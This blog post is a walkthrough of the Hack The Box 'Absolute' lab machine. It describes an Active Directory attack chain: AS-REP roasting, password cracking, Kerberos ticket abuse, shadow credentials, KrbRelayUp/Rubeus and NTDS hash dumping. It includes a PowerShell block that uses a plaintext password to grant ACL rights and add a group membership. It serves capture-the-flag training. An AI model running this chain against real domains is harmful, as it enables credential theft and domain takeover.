In this post, I would like to share a walkthrough of the Absolute Machine from Hack the Box
This room will be considered an Insane machine on Hack the Box
- What will you gain from the Absolute machine?
- Information Gathering on Absolute Machine
- Enumerate the username and password
- Brute-force a valid Active Directory account using Kerbrute
- Bloodhound analyze
- Using the Python script to obtain the foothold on an Absolute Machine
- Escalate to Root Privileges Access
What will you gain from the Absolute machine?
For the user flag, you will need to abuse the vulnerability with AS-REP-Roast to retrieve credentials and figure out the username format. We are required to perform an enumeration on LDAP service on the machine in which we found a new credential. As a result, we should use Linux commands to add the user(m.lovegod) into the network group in the domain controller.
As for the root flag, you only need to use a bunch of tools such as KrbRelayUP ,Rubues, and RunasCS to finally obtain the admin account hashes which we will use it in evil-winrm process
Information Gathering on Absolute Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
┌─[darknite@parrot]─[~/Document/htb/Absolute]
└──╼ $sudo nmap -sC -sV 10.10.11.181 -oA initial
[sudo] password for darknite:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-04 06:34 EDT
Nmap scan report for 10.10.11.181
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-04 17:34:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
|_ssl-date: 2023-04-04T17:35:45+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-04T17:35:46+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-04T17:35:45+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
|_ssl-date: 2023-04-04T17:35:46+00:00; +7h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-04T17:35:39
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
There are a few ports that we can investigate but let’s access the website interface first
There is nothing to see on the website interface at all.
Therefore, let’s try to find all the hero images on the website itself.
Enumerate the username and password
The screenshot above shows the author of the image that we just downloaded earlier.
As a result, we should be getting a list of potential usernames as those shown above.
┌──[darknite@parrot]─[/opt/CrackMapExec]
└──╼ $poetry run crackmapexec smb absolute.htb
SMB absolute.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
The command of crackmapexec above shows the smb information on the machine.
We should be getting some random user’s hashes by running the impact-GetNPUsers tool.
As a result, the hashes should look something as shown above.
At last, we managed to obtain the password for d.klay by executing the John the Ripper
Brute-force a valid Active Directory account using Kerbrute
Therefore, we should be using the kerbrute for this activity.
The screenshot above shows only if the tool works properly on our attacker’s machine.
Sadly, the tool doesn’t work because we didn’t whitelist the Activity Directory’s domain on our /etc/hosts
However, we didn’t retrieve any useful information on any valid username.
We also get an error saying “Status_Account_Restriction” when looking with crackmapexec on smb service.
As a result, we need to update the ntpdate for the domain.
We should get a d.klay.ccache ticket by running the command above.
We managed to get the svc_smb password by running the ldapsearch command
Again, we should be saving the ticket ccache
Therefore, let’s export the ticket the KRB5CNAME.
We also get the smbclient tool
We should be getting the /shares
There are two files that are stored inside the shared directory.
Let’s download those files on the
Bloodhound analyze
We should get the bloodhound running by using those commands above.
The analysis from the bloodhound is that user (m.lovegod) is own the Network Audit groups but the user is not a member of the Network Audit group. As a result, we should add the user (m.lovegod into the group where the permission will have the GenericWrite on winrm_user. Therefore, we can use the pyWhisker in the next stage to add the new KeyCredential from m.lovegod to winrm_users’ msDS-KeyCredentialLink attribute. By using gettgtpkinit.py script, we can request a TGT with the Kerberos PKINIT for the winrm_user.
Using the Python script to obtain the foothold on an Absolute Machine
There have two methods of obtaining a foothold on the machine which depend on the attacker’s usage
$dc_domain="ABSOLUTE.HTB"
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ABSOLUTE.HTB\m.lovegod', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController DC.ABSOLUTE.HTB -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server DC.ABSOLUTE.HTB
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController DC.ABSOLUTE.HTB -Credential $cred
The command above can be used on Windows Operating System. In my case, I’m using the Linux Operating System to obtain a foothold
Firstly, we can execute the script above to where we should be able to change an object’s owner
Another script that we should use would be dacledit which we can manipulate the DACL for the machine
We should be able to verify that the dacl has been compiled
The command above will add the user to the Network Audit Group Policy
Normally, we should execute the command above to create the ticket
Therefore, we can export the ticket
Finally, we can access the user by running the evil-winrm command above within the absolute machine
We can read the user flag by running the “cat user.txt” command
Escalate to Root Privileges Access
I notice that there has an Administrator who resides in one domain admin that might look so easy to verify the target. As we already access the domain controller, let’s escalate the privileges access in the computer which we can abuse by performing a full dump of the NTDS.
After a while, we managed to find a few methods which require to use of tools such as KrbRelayUp, Rubues, and RunasCS which can be downloaded from SharpCollection
The domain controller has validated the requisites and m.lovegod is validated one of those.
For those who want to obtain further on the privileges escalation which can be found here
Therefore, let’s execute the RunasCS.exe command above to obtain the Rubeus.exe command which we use in the next step.
At last, we managed to obtain NTLM hashes which we obtain on the other hashes
We can use the secretdump to dump the hashes
At last, we managed to access the Windows Machine via evil-winrm
We can read the root flag by typing the “type root.txt” command
No responses yet